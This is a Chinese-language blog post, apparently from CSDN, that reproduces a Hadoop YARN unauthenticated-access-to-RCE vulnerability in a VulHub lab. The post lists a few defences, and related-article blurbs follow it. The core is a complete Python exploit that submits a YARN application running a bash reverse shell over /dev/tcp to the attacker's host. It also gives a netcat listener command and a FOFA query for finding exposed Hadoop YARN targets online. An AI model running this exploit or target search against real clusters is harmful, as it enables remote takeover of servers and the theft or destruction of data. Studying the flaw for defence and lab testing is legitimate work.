【漏洞复现】Hadoop 未授权访问到RCE

最新推荐文章于 2024-06-24 17:42:01 发布
最新推荐文章于 2024-06-24 17:42:01 发布
阅读量75 收藏
点赞数
分类专栏: 【漏洞复现】 文章标签: hadoop 大数据 漏洞复现 渗透测试 护网漏洞 Nday 0day
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/139829719
版权

影响范围

Hadoop 

漏洞简介

Hadoop是一个开源的分布式计算框架,用于存储和处理大规模数据集,它提供了可靠、可扩展和高性能的数据处理能力,使得用户可以在廉价的硬件集群上进行大数据处理和分析,Hadoop适用于处理大规模的结构化和非结构化数据并且在处理大数据集时具有良好的可扩展性和容错性,它被广泛应用于互联网公司、科学研究、金融行业等领域,用于大数据处理、日志分析、机器学习和数据挖掘等任务,而由于服务器直接在开放了Hadoop机器HDFS的50070 Web端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,例如:进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害

环境搭建

在这里我们使用VulHub来构建环境

docker-compose up -d

漏洞检测

未授权访问

http://192.168.204.191:8088/cluster

反弹Shell

在发现存在Hadoop未授权访问的时候我们可以通过借助REST API来进行命令执行并实现反弹shell的目的:

Step 1:本地监听8888端口

nc -lnvp 8888

Step 2:执行漏洞EXP

#!/usr/bin/env python

import requests

target = 'http://192.168.204.191:8088/'
lhost = '192.168.204.135' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/8888 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

目标检索

FOFA:

app="APACHE-hadoop-YARN"

防御手段 

  • 无必要则关闭Hadoop Web管理页面
  • 开启身份验证,防止未经授权用户访问
  • 设置"安全组"访问控制策略并将Hadoop默认开放的多个端口对公网全部禁止或限制可信任的IP地址才能访问包括50070以及WebUI等相关端口
FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
数据库服务安全--Mysql授权--Hadoop授权配合RCE--Redis授权&RCE
weixin_68243135的博客
11-21 2204
数据库安全漏洞--MySQL--Hadoop--Redis
Hadoop YARN ResourceManager授权访问漏洞
Kevin's Blog
06-01 4991
文章目录一、介绍1.1 简介1.2 漏洞成因二、模拟环境三、信息收集四、攻击方法五、漏洞防御 一、介绍 1.1 简介   Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。   Apache Hadoop YARN是Hadoop的核心组件之一,负责将资源分配在Hadoop集群中运行的各种应用程序,并调度要在不同集群节点上执行的任务。(独立出的资源管理框架,负责资源管理和调度) 1.2 漏洞成因   负责对资源进行同一管理调度的ReasourceManager组件的
Hadoop-授权访问-内置配合命令执行RCE
MateSnake的博客
05-12 636
Hadoop-授权访问-内置配合命令执行RCE
服务攻防-数据库安全-服务应用的安全问题以及测试流程-Mysql&Hadoop&授权访问&RCE-漏洞复现
ran的博客
05-05 3125
因为其服务是放在内网主机上面的,在内网内开了许多服务(端口 ),比如web和数据库,但是其只将web映射到外网,所以我们只能看到其服务在外网是开的,但是在进行扫描的时候我们扫描的仅仅是组网主机,而组网主机会将数据转发到内网再做处理,所以我们检测不到对应服务端口的开放。有些服务是通过口令验证来去判断服务的启动和禁用的,比如数据库里面有一些数据库里面就内置的数据库的用户,包括账号和密码,如果说设置的这个账号和密码过于简单的话,那么攻击者就可以通过弱口令的猜解得到账号以及密码之后进入,来进行一些安全的测试。
Hadoop Yarn RPC授权远程代码执行漏洞复现
Armandhe的博客
11-15 2436
Hadoop Yarn RPC授权远程代码执行漏洞第一时间复现
Hadoop YARN ResourceManager 授权访问getshell
09-23
利用Hadoop YARN ResourceManager 授权访问getshell工具以及WORD说明
Zookeeper授权访问测试问题
09-29
ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。这篇文章主要介绍了Zookeeper授权访问测试,需要的朋友可以参考下
面向Hadoop的风险访问控制模型
03-03
传统的访问控制机制难以约束授权用户的恶意行为,使得采用这种访问控制机制的 Hadoop 平台面临着大数据隐私泄露的风险。提出了一种基于风险的访问控制模型,该模型通过对主体和客体标签的设定,根据用户的历史行为...
springboot对hadoop增删改查源码及hadoop图片访问
02-28
- 安全方面,应考虑添加权限控制,限制对Hadoop存储的敏感资源的访问,防止授权访问。 综上所述,这个项目涉及到的技术栈包括SpringBoot的集成、Hadoop的文件操作以及Servlet的使用。通过这些技术的结合,我们...
Hadoop YARN ResourceManager 授权访问 漏洞复现
ADummy的博客
03-10 593
Hadoop YARN ResourceManager 授权访问 by ADummy 0x00利用路线 ​ exp直接打—>其实是发了两次http包 0x01漏洞介绍 ​ 访问http://your-ip:8088即可看到Hadoop YARN ResourceManager WebUI页面 ​ 本机监听9999端口,收到shell 0x03参考资料 https://blog.csdn.net/xuandao_ahfengren/article/details/107127276 e/d
二百四十、Hadoop——解决Hadoop 授权访问漏洞
最新发布
tiantang2renjian的博客
06-24 1026
Hadoop——解决Hadoop 授权访问漏洞
Hadopp授权访问导致RCE
qq_69775412的博客
01-25 858
Hadoop是一个开源的分布式计算框架,用于处理大规模数据集的存储和处理。它基于Google的MapReduce算法和Google File System(GFS)的论文,旨在提供一个可靠、可扩展、分布式存储和处理大规模数据的解决方案。漏洞产生原因:负责对资源进行同一管理调度的 ReasourceManager 组件的UI管理界面开放在 8080/8088 端口,攻击者无需认证即可通过REST API 部署任务来执行任意命令,最终可完全控制集群中所有的机器。
Hadoop Yarn RPC远程命令执行
Fly_鹏程万里
11-25 5822
影响范围 Hadoop Yarn RPC 漏洞类型 远程命令执行 利用条件 可授权访问 漏洞概述 2021年11月15日,有安全研究人员披露Hadoop Yarn RPC存在授权访问漏洞,此漏洞存在于Hadoop的核心组件Hadoop Yarn中,因Hadoop Yarn默认对外开放RPC服务,导致远程攻击者可利用此授权漏洞并通过RPC服务执行任意命令,从而达到控制目标服务器的目的,鉴于此漏洞为高危状态,危害较大,且细节已公开、被在野利用,建议所有使用Apache Hadoop的用户及时
Hadoop 漏洞复现
MrHatSec的博客
08-01 5841
Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。
数据库安全-Redis授权&Hadoop&Mysql&授权访问&RCE 漏洞复现
rumil的博客
10-13 1368
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露,包括端口的授权常见页面的授权 /admin.php /menu.php常见的授权访问漏洞及默认端口:默认端口统计:8095, 8161, 9100, 9200, 9300, 11211, 15672, 15692, 20048, 25672, 27017]等待。
漏洞复现Hadoop YARN 资源管理系统 REST API授权访问
weixin_43486390的博客
12-18 4286
0x01 概述 Hadoop是一款由Apache基金会推出的分布式系统框架,它通过著名的 MapReduce 算法进行分布式处理,Yarn是Hadoop集群的资源管理系统。YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当可导致授权访问的问题,攻击者无需认证即可通过REST API部署任务来执行任意指令,最终完全控制服务器。 0x02 影响范围 (1)Apache Hadoop YARN资源管理系统 (2)对外
YARN 远程代码执行(RCE)安全漏洞问题分析与解决方案
明哥的IT随笔
04-26 1464
某客户使用Tenable.sc扫描安全漏洞后反馈,YARN 存在Remote code execution (RCE) 安全漏洞问题,攻击者可在经过身份验证的情况下通过该漏洞在受影响主机执行任意命令,最终控制服务器。
hadoop授权访问
10-21
Hadoop授权访问指的是用户在尝试访问Hadoop集群资源时,授权的权限要求被拒绝。这可能是因为用户没有正确的用户名和密码,或者缺乏足够的权限来执行所需的操作。 要解决Hadoop授权访问的问题,可以采取以下步骤: 1. 检查用户名和密码:确保用于访问Hadoop集群的用户名和密码是正确的。如果是通过Web界面或API进行访问,确保输入的凭据是正确的,并且没有拼写错误。 2. 检查权限:查看用户是否具有执行所需操作的权限。Hadoop通常使用基于角色的访问控制(RBAC)来管理权限。确保用户被分配了正确的角色,并且角色具有所需的权限。 3. 检查防火墙设置:如果Hadoop集群位于防火墙后面,确保相应的端口已打开,以允许用户访问集群资源。 4. 检查配置文件:在Hadoop配置文件中,如core-site.xml和hdfs-site.xml,确保没有错误的配置或权限设置。验证这些文件中的配置是否正确,并根据需要进行修复。 5. 检查网络连接:确保用户的网络连接稳定,没有任何网络问题。如果网络连接不稳定,可能会导致Hadoop集群无法访问。 6. 检查Hadoop日志:查看Hadoop集群的日志,了解是否有关于访问被拒绝的错误消息。根据错误消息的提示,采取相应的措施来解决访问问题。 通过以上步骤,您应该能够解决Hadoop授权访问的问题,并成功访问和管理Hadoop集群资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值